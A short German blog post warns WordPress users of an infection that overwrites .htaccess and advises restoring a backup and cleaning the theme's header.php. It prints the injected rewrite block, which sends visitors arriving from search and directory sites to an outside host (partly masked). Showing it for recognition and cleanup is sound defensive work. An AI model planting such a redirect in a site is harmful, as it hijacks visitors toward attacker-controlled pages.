So langsam wird es ärgerlich für WordPress Nutzer. Nachdem nun viel Alarm wegen eines Virus aufgekommen war der einzelne WordPress Dateien die mit index… oder header… und einigen anderen Namen befallen hatte kommt nun der nächste Husten auf uns zu.
Alle WordPress Nutzer mussten lediglich einige Dateien bereinigen oder noch besser gleich auf das neue WordPress updaten, jetzt noch schnell die Passwörter ändern und der Virus wäre Geschichte. Denkste!
Neuer Virusbefall der .htaccess
In diesem speziellen Fall leider zerhaut es die gesamte .htaccess ob die Rechte nun auf 644 gesetzt sind oder nicht spielt keine Rolle. Hier hilft nur, überspielen der Datei. Wer diese vorher gesichert hat ist jetzt klar im Vorteil und wer den Virus noch nicht hat sollte die .htaccess unbedingt schnell sichern.
So sieht die befallene .htaccess nun aus. Weg mit dem Dreck und rein mit der neuen. Im gleichen Atemzug bitte auch noch die header.php des Themes bereinigen dort hat sich der andere Dateien Virus mit Sicherheit auch wieder eingeschlichen.
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|..gekürzt..|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabanxx.xx.xx/stats.php [R=301,L]
</IfModule>
#/c3284d#